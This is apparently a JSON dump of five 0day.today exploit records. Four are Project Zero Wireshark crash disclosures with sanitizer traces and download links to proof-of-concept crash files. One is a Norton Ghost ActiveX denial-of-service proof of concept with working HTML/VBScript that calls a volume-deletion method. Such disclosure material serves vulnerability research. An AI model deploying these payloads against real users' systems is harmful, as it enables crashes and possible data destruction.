{"result": {"zdt": [{"lastseen": "2018-04-13T07:50:41", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-05-13T00:00:00", "title": "Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-13T07:50:41", "vector": "AV:N/AC:H/Au:M/C:C/I:C/A:C/", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-05-13T00:00:00", "id": "1337DAY-ID-26008", "href": "https://0day.today/exploit/description/26008", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work 
wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 
0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. 
Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26008"}, {"lastseen": "2018-01-10T03:19:33", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-03-31T00:00:00", "title": "Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-10T03:19:33", "vector": "AV:N/AC:L/Au:M/C:P/I:N/A:P/", "value": 4.7}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-31T00:00:00", "id": "1337DAY-ID-25907", "href": "https://0day.today/exploit/description/25907", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=754\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==17304==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004507c1 bp 0x7fff09b13420 sp 0x7fff09b12bd0\r\nREAD of size 1431 at 0x61b00001335c thread T0\r\n #0 0x4507c0 in __interceptor_strlen llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581\r\n #1 0x7fead8aeeb02 in g_strdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b02)\r\n #2 0x7feae0a0b1ef in string_fvalue_set_string wireshark/epan/ftypes/ftype-string.c:51:30\r\n #3 0x7feae09e83f8 in fvalue_set_string wireshark/epan/ftypes/ftypes.c:530:2\r\n #4 0x7feae0867874 in proto_tree_set_string wireshark/epan/proto.c:3572:3\r\n #5 0x7feae088ae05 in proto_tree_add_string wireshark/epan/proto.c:3478:2\r\n #6 0x7feae088b135 in proto_tree_add_string_format_value wireshark/epan/proto.c:3492:7\r\n #7 
0x7feae213aa61 in dissect_pktc_rekey wireshark/epan/dissectors/packet-pktc.c:436:5\r\n #8 0x7feae2139f71 in dissect_pktc wireshark/epan/dissectors/packet-pktc.c:624:16\r\n #9 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #10 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #11 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #12 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9\r\n #13 0x7feae296ebf5 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:583:7\r\n #14 0x7feae297dc90 in dissect wireshark/epan/dissectors/packet-udp.c:1081:5\r\n #15 0x7feae29719d0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1087:3\r\n #16 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #17 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #18 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #19 0x7feae19601db in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1978:7\r\n #20 0x7feae19cf7c1 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2431:14\r\n #21 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #22 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #23 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #24 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9\r\n #25 0x7feae1fde9c9 in dissect_null wireshark/epan/dissectors/packet-null.c:458:12\r\n #26 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #27 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #28 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #29 0x7feae1542dd5 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #30 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #31 0x7feae0805a4a in 
call_dissector_work wireshark/epan/packet.c:701:9\r\n #32 0x7feae080f58e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #33 0x7feae0800f4f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #34 0x7feae0800324 in dissect_record wireshark/epan/packet.c:509:3\r\n #35 0x7feae07b36c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #36 0x52f11b in process_packet wireshark/tshark.c:3748:5\r\n #37 0x52840c in load_cap_file wireshark/tshark.c:3504:11\r\n #38 0x51e71c in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2148 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7fead8ad7610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7feaed2fef08 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x52473d in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51e12d in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581 in __interceptor_strlen\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte 
represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==17304==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12242. Attached is a file which triggers the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39644.zip\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25907"}, {"lastseen": "2018-01-02T01:08:54", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-03-23T00:00:00", "title": "Wireshark - dissect_ber_integer Static Out-of-Bounds Write", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T01:08:54", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/", "value": 5.4}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-23T00:00:00", "id": "1337DAY-ID-25896", "href": "https://0day.today/exploit/description/25896", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=750\r\n \r\nThe following crash due to a static memory out-of-bounds write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==28209==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fde2f36bfc4 at 
pc 0x7fde25b1332c bp 0x7fffe48bc670 sp 0x7fffe48bc668\r\nWRITE of size 4 at 0x7fde2f36bfc4 thread T0\r\n #0 0x7fde25b1332b in dissect_ber_integer epan/dissectors/packet-ber.c:2001:16\r\n #1 0x7fde27f46621 in dissect_kerberos_ADDR_TYPE epan/dissectors/../../asn1/kerberos/kerberos.cnf:351:12\r\n #2 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17\r\n #3 0x7fde27f4656f in dissect_kerberos_HostAddress epan/dissectors/../../asn1/kerberos/kerberos.cnf:233:12\r\n #4 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17\r\n #5 0x7fde27f4badf in dissect_kerberos_EncKrbPrivPart epan/dissectors/../../asn1/kerberos/kerberos.cnf:407:12\r\n #6 0x7fde25b040f7 in dissect_ber_tagged_type epan/dissectors/packet-ber.c:695:18\r\n #7 0x7fde27f42384 in dissect_kerberos_ENC_KRB_PRIV_PART epan/dissectors/../../asn1/kerberos/kerberos.cnf:417:12\r\n #8 0x7fde25b1f100 in dissect_ber_choice epan/dissectors/packet-ber.c:2917:21\r\n #9 0x7fde27f4139a in dissect_kerberos_Applications epan/dissectors/../../asn1/kerberos/kerberos.cnf:185:12\r\n #10 0x7fde27f3f7b2 in dissect_kerberos_common epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2103:10\r\n #11 0x7fde27f3e22f in dissect_kerberos_main epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2134:10\r\n #12 0x7fde26f3c34f in dissect_pktc_mtafqdn epan/dissectors/packet-pktc.c:566:15\r\n #13 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #14 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #15 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #16 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9\r\n #17 0x7fde277709e5 in decode_udp_ports epan/dissectors/packet-udp.c:583:7\r\n #18 0x7fde2777fa80 in dissect epan/dissectors/packet-udp.c:1081:5\r\n #19 0x7fde27773840 in dissect_udplite epan/dissectors/packet-udp.c:1094:3\r\n #20 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #21 0x7fde25606f3a 
in call_dissector_work epan/packet.c:701:9\r\n #22 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #23 0x7fde267660bb in ip_try_dissect epan/dissectors/packet-ip.c:1978:7\r\n #24 0x7fde26770de8 in dissect_ip_v4 epan/dissectors/packet-ip.c:2472:10\r\n #25 0x7fde26766819 in dissect_ip epan/dissectors/packet-ip.c:2495:5\r\n #26 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #27 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #28 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #29 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9\r\n #30 0x7fde26f6e380 in dissect_ppp_common epan/dissectors/packet-ppp.c:4344:10\r\n #31 0x7fde26f6db3c in dissect_ppp_hdlc_common epan/dissectors/packet-ppp.c:5337:5\r\n #32 0x7fde26f65df5 in dissect_ppp_hdlc epan/dissectors/packet-ppp.c:5378:5\r\n #33 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #34 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #35 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #36 0x7fde2634fe55 in dissect_frame epan/dissectors/packet-frame.c:493:11\r\n #37 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #38 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #39 0x7fde25610a7e in call_dissector_only epan/packet.c:2674:8\r\n #40 0x7fde2560243f in call_dissector_with_data epan/packet.c:2687:8\r\n #41 0x7fde25601814 in dissect_record epan/packet.c:509:3\r\n #42 0x7fde255b4bb9 in epan_dissect_run_with_taps epan/epan.c:376:2\r\n #43 0x52f11b in process_packet tshark.c:3748:5\r\n #44 0x52840c in load_cap_file tshark.c:3504:11\r\n #45 0x51e71c in main tshark.c:2213:13\r\n \r\n0x7fde2f36bfc4 is located 4 bytes to the right of global variable 'cb' defined in 'packet-pktc.c:539:27' (0x7fde2f36bfa0) of size 32\r\nSUMMARY: AddressSanitizer: global-buffer-overflow epan/dissectors/packet-ber.c:2001:16 in dissect_ber_integer\r\nShadow bytes around the buggy 
address:\r\n 0x0ffc45e657a0: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9\r\n 0x0ffc45e657b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9\r\n 0x0ffc45e657c0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n 0x0ffc45e657d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e657e0: 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9\r\n=>0x0ffc45e657f0: f9 f9 f9 f9 00 00 00 00[f9]f9 f9 f9 00 00 00 00\r\n 0x0ffc45e65800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==28209==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12206. 
Attached is a file which triggers the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39604.zip\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25896"}, {"lastseen": "2018-04-06T01:48:14", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-03-07T00:00:00", "title": "Wireshark - wtap_optionblock_free Use-After-Free", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-06T01:48:14", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/", "value": 8.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-07T00:00:00", "id": "1337DAY-ID-25861", "href": "https://0day.today/exploit/description/25861", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=739\r\n \r\nThe following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8\r\nREAD of size 4 at 0x60400009d960 thread T0\r\n #0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20\r\n #1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4\r\n #2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #3 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)\r\nfreed by thread T0 here:\r\n #0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30\r\n #1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9\r\n #2 0x7ff7905d7b58 in wtap_close 
wireshark/wiretap/wtap.c:1211:4\r\n #3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #4 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35\r\n #3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7\r\n #4 0x528036 in load_cap_file wireshark/tshark.c:3499:12\r\n #5 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free\r\nShadow bytes around the buggy address:\r\n 0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa\r\n=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa\r\n 0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container 
overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==6853==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25861"}, {"lastseen": "2018-01-08T15:07:44", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "shinnai", "published": "2009-04-23T00:00:00", "title": "Norton Ghost Support module for EasySetup wizard Remote DoS PoC", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-08T15:07:44", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-04-23T00:00:00", "id": "1337DAY-ID-6843", "href": "https://0day.today/exploit/description/6843", "sourceData": "===============================================================\r\nNorton Ghost Support module for EasySetup wizard Remote DoS PoC\r\n===============================================================\r\n\r\n\r\n-----------------------------------------------------------------------------------------\r\n Norton Ghost Support module for EasySetup wizard Remote DoS/Arbitrary code execution(?)\r\n url: http://www.symantec.com/\r\n\r\n Author: shinnai\r\n\r\n File: EasySetupInt.dll\r\n Ver.: 14.0.4.30167\r\n ProgID: Symantec.EasySetup.1\r\n Descr.: CEasySetup Object - Support module for EasySetup wizard\r\n \r\n Marked as: RegKey Safe for Script: True\r\n RegKey Safe for Init: True\r\n Implements IObjectSafety: False\r\n KillBitSet: False\r\n\r\n Bug info: This component contains methods which lead into a denial of\r\n service.\r\n This 
is the list of components:\r\n\r\n \"GetBackupLocationPath\"\r\n \"CallUninstall\"\r\n \"SetupDeleteVolume\"\r\n \"CanUseEasySetup\"\r\n \"CallAddInitialProtection\"\r\n \"CallTour\"\r\n\r\n Crash happens here:\r\n\r\n 03A6B9D6 8B10 MOV EDX,DWORD PTR DS:[EAX]\r\n\r\n And registers situation is:\r\n \r\n EAX 00000000\r\n ECX 774F9997 ole32.774F9997\r\n EDX 019DCB04\r\n EBX 00000000\r\n ESP 019DCAE4\r\n EBP 019DCB9C\r\n ESI 019DCCB8\r\n EDI 00000001\r\n EIP 03A6B9D6 EasySetu.03A6B9D6\r\n\r\n Unfortunately the vulnerability seems to be unexploitable, anyway\r\n I've found a way to execute arbitrary code but it's useless \r\n because it requires a high level of user interaction to work.\r\n That's why it will remain private.\r\n I hope that someone else will be able to exploit this vuln\r\n using more convenient ways.\r\n\r\n Peace \r\n\r\n This was written for educational purpose. Use it at your own risk.\r\n Author will not be responsible for any damage.\r\n\r\n Tested on Windows XP Professional SP3 with Internet Explorer 7\r\n-----------------------------------------------------------------------------------------\r\n<object classid='clsid:7972D5BE-2213-4B28-884C-F8F82432EAA5' id='test'></object>\r\n\r\n<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\r\n\r\n<script language='vbscript'>\r\n Sub tryMe\r\n test.SetupDeleteVolume()\r\n End Sub\r\n</script>\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6843"}]}}